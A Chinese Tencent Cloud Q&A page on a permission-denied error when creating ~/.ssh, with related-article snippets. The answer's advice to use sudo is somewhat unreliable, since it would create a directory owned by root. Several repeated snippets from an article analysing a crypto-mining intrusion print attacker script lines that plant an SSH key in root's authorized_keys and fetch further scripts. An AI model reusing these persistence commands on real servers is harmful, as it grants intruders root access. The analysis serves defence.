首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

mkdir -p ~ /.ssh返回权限被拒绝

mkdir -p ~ /.ssh 命令的作用是在用户的主目录下创建一个名为 .ssh 的文件夹。

报错 "权限被拒绝" 表示当前用户没有足够的权限执行该命令。可能的原因是该用户对主目录没有写入权限或者已经存在同名的文件或文件夹。

要解决这个问题,可以尝试以下几个步骤:

  1. 检查当前用户对主目录的权限:使用 ls -ld ~ 命令来查看主目录的权限设置。确保当前用户拥有写入权限。
  2. 检查是否已存在同名的文件或文件夹:使用 ls -a ~ 命令来查看主目录下所有文件和文件夹,确认是否已存在名为 .ssh 的文件夹或文件。如果存在,可以选择删除或备份后再次运行 mkdir -p ~ /.ssh 命令。
  3. 修改文件夹创建命令:尝试使用 sudo mkdir -p ~ /.ssh 命令以管理员权限创建文件夹。这将要求输入管理员密码。

请注意,在回答中无法提供腾讯云相关产品和链接地址,但可以指出腾讯云的相关产品可以用于服务器运维、云原生、网络通信、网络安全、存储等方面的解决方案。您可以参考腾讯云的官方文档或咨询他们的技术支持获取更多关于这些产品的信息。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

  • 服务器要删除文件访问被拒绝,删除文件提示:文件夹访问被拒绝 需要来自administrator权限执行操作…

    有时候我们在删除一些系统重要文件,或者被保护的文件的时候,会出现对话框,提示我们您需要来自administrator权限才能对此文件夹进行更改,这是什么原因导致的?今天小编就为大家分析下解决办法。...方法/步骤 1、右键点击提示我们需要权限的文件夹,然后点击【属性】选项。 2、进入文件夹属性界面在上方菜单栏处,找到【安全】选项,然后点击下方的高级选项。...5、返回文件夹属性安全标签下,在组或用户名列表中,查看自己用户是否添加成功。 6、然后点击【组或用户名】下方的编辑选项,进入用户编辑对话框。...以上就是文件夹访问被拒绝 需要来自administrator权限执行操作的解决方法介绍,操作很简单的,大家学会了吗?希望这篇教程能对大家有所帮助!

    5.9K10

    当ProductOptions之类的重要注册表键权限被拒绝后肿么办!

    2K8R2上比较突出) 问题:【HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions】键的【administrators】组的读权限被拒绝...,导致系统无法启动 解决思路:利用SYSTEM权限把被拒绝的administrators权限改回 解决办法: 1、用SC命令创建交互服务,目的是以SYSTEM权限启动一些东西~例如CMD sc create...2、撤销对该键所作的拒绝权限 3、问题解决~事成之后可以删除刚刚创建的服务 若不幸已经做过重启/关机操作,导致再也进不了系统的话,则要: 1、用另一个WIN5.X/6.X系统的regedit加载该键所在的注册表配置单元...● 之所以说这个问题在W2K8R2上比较突出,是因为在其它系统上勾选拒绝权限后,只要不关闭权限设置对话框,还可以再取消勾选并成功【应用】,但W2K8R2就无法应用了

    1.4K30

    git 自己搭建服务器_github搭建服务器

    adduser git passwd git chmod 755 /home/git su git cd mkdir .ssh && chmod 700 .ssh touch .ssh/authorized_keys...&& chmod 600 .ssh/authorized_keys 说明:上述使用chmod命令设置权限的步骤一定不能漏,否则可能使用不了ssh连接到git用户,或者git操作不了远程仓库。...创建Git仓库目录 su git mkdir -p /home/git/project.gi cd /home/git/project.git/ git init --bare 说明:至此,一个git空仓库已经创建好了...如果将 git-shell 设置为用户 git 的登录 shell(login shell), 那么该用户便不能获得此服务器的普通 shell 访问权限。...如果试图登录,你会发现尝试被拒绝,像这样: hhs@DESKTOP-8TR991O MINGW64 ~/.ssh $ ssh git@192.168.41.41 Last login: Sat May

    9.1K20

    如何在Ubuntu 16.04上为用户目录设置vsftpd

    创建ftp文件夹,设置其所有权,并确保使用以下命令删除写入权限: sudo mkdir /home/sammy/ftp sudo chown nobody:nogroup /home/sammy/ftp.../files 对files目录的权限检查应返回以下内容: sudo ls -la /home/sammy/ftp Outputtotal 12 dr-xr-xr-x 3 nobody nogroup 4096...当它设置为“YES”时,列表中的用户被拒绝FTP访问。当它设置为“NO”时,只允许列表中的用户访问。完成更改后,保存并退出文件。 最后,我们将创建用户并将其添加到文件中。...如果我们已正确完成,则应拒绝匿名用户的权限: ftp -p 203.0.113.0 Connected to 203.0.113.0. 220 (vsFTPd 3.0.3) Name (203.0.113.0...他们也应该被拒绝访问,并且应该在他们被允许输入密码之前发生。

    2.3K00

    通过QEMU-GuestAgent实现从外部注入写文件到KVM虚拟机内部

    注入操作说明 实验目标:将RSA的公钥内容写入到/root/.ssh/authorized_keys 这涉及到如下3个步骤: 创建/root/.ssh目录且权限为700 创建/root/.ssh.../authorized_keys文件且权限为600 将RSA公钥文本进行Base64编码(guest-file-write不支持明文,仅支持base64),并将编码后的内容写入/root/.ssh...开始注入 1️⃣ 创建/root/.ssh目录且权限为700 # mkdir /root/.ssh virsh qemu-agent-command ${DOMAIN} '{"execute":"guest-exec...","arguments":{"path":"mkdir","arg":["-p","/root/.ssh"],"capture-output":true}}' # 假设上一步返回{"return":.../authorized_keys文件且权限为600 # touch /root/.ssh/authorized_keys virsh qemu-agent-command ${DOMAIN} '{"execute

    2.4K20

    记一次 Linux 被入侵,服务器变“矿机”全过程

    不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。 我放下酸菜馅的包子,SSH 连了一下,被拒绝了,问了下默认的 22 端口被封了。...-p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa...继续下载并分析 bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p...写这个配置,自然也就是利用了 Redis 把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的 /root/.ssh/authorized_keys...总结 通过依次分析这 3 个脚本,就能看出这个病毒的可怕之处,先是通过写入 ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过 Redis 漏洞复制,迅速在全网传播,以指数级速度增长

    98520

    记一次 Linux 被入侵,服务器变“矿机”全过程

    我放下酸菜馅的包子,SSH 连了一下,被拒绝了,问了下默认的 22 端口被封了。...-p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa...继续下载并分析 bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p...写这个配置,自然也就是利用了 Redis 把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登录被写入公钥的服务器了,无需密码就可以登录,也就是我们文章最开始的 /root/.ssh/authorized_keys...总结 通过依次分析这 3 个脚本,就能看出这个病毒的可怕之处,先是通过写入 ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过 Redis 漏洞复制,迅速在全网传播,以指数级速度增长

    1.3K30

    一次 Linux 服务器被入侵变矿机记实

    不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。 我放下酸菜馅的包子,SSH 连了一下,被拒绝了,问了下默认的 22 端口被封了。...-p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa...继续下载并分析 bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p...结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的 /root/.ssh/authorized_keys。 登录之后就开始定期执行计划任务,下载脚本。...总结 通过依次分析这 3 个脚本,就能看出这个病毒的可怕之处,先是通过写入 SSH Public Key 拿到登录权限,然后下载执行远程二进制文件,最后再通过 Redis漏洞复制,迅速在全网传播,以指数级速度增长

    1.2K30

    记一次Linux被入侵,服务器变“矿机”全过程

    我放下酸菜馅的包子,SSH 连了一下,被拒绝了,问了下默认的 22 端口被封了。...-p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa...继续下载并分析 bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p...写这个配置,自然也就是利用了 Redis 把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的 /root/.ssh/authorized_keys...总结 通过依次分析这 3 个脚本,就能看出这个病毒的可怕之处,先是通过写入 ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过 Redis 漏洞复制,迅速在全网传播,以指数级速度增长

    1.2K20

    记一次 Linux 被入侵,服务器变“矿机”全过程

    不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。 我放下酸菜馅的包子,SSH 连了一下,被拒绝了,问了下默认的 22 端口被封了。...-p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa...继续下载并分析 bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p...写这个配置,自然也就是利用了 Redis 把缓存内容写入本地文件的漏洞,结果就是用本地的私钥去登陆被写入公钥的服务器了,无需密码就可以登陆,也就是我们文章最开始的 /root/.ssh/authorized_keys...总结 通过依次分析这 3 个脚本,就能看出这个病毒的可怕之处,先是通过写入 ssh public key 拿到登录权限,然后下载执行远程二进制文件,最后再通过 Redis 漏洞复制,迅速在全网传播,以指数级速度增长

    1K30

    自主可控:基于OpenEuler基础镜像的Go语言容器开发环境搭建

    通过实现自主可控,可以保护国家的核心技术和关键数据,避免被外部势力窃取或滥用。从我们个人层面来说,自主可控可以保护个人隐私,避免个人信息被滥用或泄露。这对社会稳定和个人权利保护都有重要意义。...-d /workspace ] && mkdir /workspace mkdir "${GOPATH}/src" "${GOPATH}/bin" "${GOPATH}/pkg" chown -R ${...SSH_USERNAME}:${SSH_GROUP} /workspace exec "$@" 脚本中根据环境变量传入的值完成用户添加、权限配置,确保在容器运行后主机用户与容器内用户权限一致。...配合容器启动命令,在主机和容器内均有相同的权限。...ssh ivan@192.168.1.1 -p 2024 按提示输入密码即可登录,192.168.1.1为本机IP。所有坑我都替大家踩过了,快去试试吧!

    50520

    4.4 服务器上的 Git - 配置服务器

    $ sudo adduser git $ su git $ cd $ mkdir .ssh && chmod 700 .ssh $ touch .ssh/authorized_keys && chmod...vim README $ git commit -am 'fix for the README file' $ git push origin master 通过这种方法,你可以快速搭建一个具有读写权限...如果将 git-shell 设置为用户 git 的登录 shell(login shell),那么用户 git 便不能获得此服务器的普通 shell 访问权限。...如果试图登录,你会发现尝试被拒绝,像这样: $ ssh git@gitserver fatal: Interactive git shell is not enabled. hint: ~/git-shell-commands...比如,你可以限制掉某些本应被服务器接受的 Git 命令,或者对刚才的 SSH 拒绝登录信息进行自定义,这样,当有开发者用户以类似方式尝试登录时,便会看到你的信息。

    2.3K50
    领券